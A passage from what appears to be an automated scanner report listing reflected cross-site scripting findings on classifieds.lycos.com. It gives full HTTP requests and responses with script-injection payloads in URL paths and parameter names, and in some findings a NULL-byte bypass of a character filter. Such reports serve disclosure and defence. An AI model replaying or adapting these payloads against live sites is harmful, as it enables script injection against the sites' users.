HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:03:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:54 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog1e47d"><script>alert(1)</script>3e3b210a263/healthy-english-bulldog-puppies-2416171752?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c2c49"><script>alert(1)</script>939ac719ce9 was submitted in the REST URL parameter 2. This input was echoed as c2c49"><script>alert(1)</script>939ac719ce9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-pet-dog/healthy-english-bulldog-puppies-2416171752%00c2c49"><script>alert(1)</script>939ac719ce9 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:31 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:31 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/healthy-english-bulldog-puppies-2416171752%00c2c49"><script>alert(1)</script>939ac719ce9?mobile=1" rel="nofollow"> ...[SNIP]...
1.143. http://classifieds.lycos.com/sale-pet-dog/healthy-english-bulldog-puppies-2416171752 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b055e"><script>alert(1)</script>edd94c248b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog/healthy-english-bulldog-puppies-2416171752?b055e"><script>alert(1)</script>edd94c248b7=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:29 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:29 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/ Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/healthy-english-bulldog-puppies-2416171752?b055e"><script>alert(1)</script>edd94c248b7=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a3fe"><script>alert(1)</script>ad8ae194ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog8a3fe"><script>alert(1)</script>ad8ae194ef/waiting-for-new-alaskan-malamute-puppies-2416164302 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:06 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17841
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog8a3fe"><script>alert(1)</script>ad8ae194ef/waiting-for-new-alaskan-malamute-puppies-2416164302?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004ebf0"><script>alert(1)</script>a2eb223d25 was submitted in the REST URL parameter 2. This input was echoed as 4ebf0"><script>alert(1)</script>a2eb223d25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302%004ebf0"><script>alert(1)</script>a2eb223d25 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:04:24 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:04:24 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302%004ebf0"><script>alert(1)</script>a2eb223d25?mobile=1" rel="nofollow"> ...[SNIP]...
1.146. http://classifieds.lycos.com/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa6ca"><script>alert(1)</script>0c908744318 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302?aa6ca"><script>alert(1)</script>0c908744318=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:03:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:03:38 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=sale%2Fpet%2Fdog; path=/ Set-Cookie: classifieds[lastpage][0][name]=Dogs; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23598
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-dog/waiting-for-new-alaskan-malamute-puppies-2416164302?aa6ca"><script>alert(1)</script>0c908744318=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0144"><script>alert(1)</script>d312a9b0273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-fishc0144"><script>alert(1)</script>d312a9b0273/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:12:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:20 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-fishc0144"><script>alert(1)</script>d312a9b0273/?mobile=1" rel="nofollow"> ...[SNIP]...
1.148. http://classifieds.lycos.com/sale-pet-fish/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-pet-fish/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b85c7"><script>alert(1)</script>713d5e4757f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-fish/?b85c7"><script>alert(1)</script>713d5e4757f=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:11:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:11:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19340
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-fish/?b85c7"><script>alert(1)</script>713d5e4757f=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3911c"><script>alert(1)</script>66ee9192fac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-supply3911c"><script>alert(1)</script>66ee9192fac/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:13:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:01 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17700
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-supply3911c"><script>alert(1)</script>66ee9192fac/?mobile=1" rel="nofollow"> ...[SNIP]...
1.150. http://classifieds.lycos.com/sale-pet-supply/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-pet-supply/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6f1"><script>alert(1)</script>cd8f68d27cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet-supply/?8a6f1"><script>alert(1)</script>cd8f68d27cb=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:12:23 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:23 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet-supply/?8a6f1"><script>alert(1)</script>cd8f68d27cb=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71d65"><script>alert(1)</script>225a18cf5e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet71d65"><script>alert(1)</script>225a18cf5e2/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17679
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet71d65"><script>alert(1)</script>225a18cf5e2/?mobile=1" rel="nofollow"> ...[SNIP]...
1.152. http://classifieds.lycos.com/sale-pet/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-pet/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578d0"><script>alert(1)</script>75191efa096 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-pet/?578d0"><script>alert(1)</script>75191efa096=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 58055
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-pet/?578d0"><script>alert(1)</script>75191efa096=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804d0"><script>alert(1)</script>d30bcf2ddf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-sale-garage804d0"><script>alert(1)</script>d30bcf2ddf0/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:53:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-sale-garage804d0"><script>alert(1)</script>d30bcf2ddf0/?mobile=1" rel="nofollow"> ...[SNIP]...
1.154. http://classifieds.lycos.com/sale-sale-garage/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-sale-garage/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba75"><script>alert(1)</script>813bfeb0c7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-sale-garage/?8ba75"><script>alert(1)</script>813bfeb0c7f=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:53:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:25 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 36136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-sale-garage/?8ba75"><script>alert(1)</script>813bfeb0c7f=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae616"><script>alert(1)</script>b08377a555c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-concertae616"><script>alert(1)</script>b08377a555c/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:36 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-concertae616"><script>alert(1)</script>b08377a555c/?mobile=1" rel="nofollow"> ...[SNIP]...
1.156. http://classifieds.lycos.com/sale-tickets-concert/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sale-tickets-concert/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c465c"><script>alert(1)</script>687d071c269 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sale-tickets-concert/?c465c"><script>alert(1)</script>687d071c269=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:49 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sale-tickets-concert/?c465c"><script>alert(1)</script>687d071c269=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ac20"><script>alert(1)</script>238d92d6570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
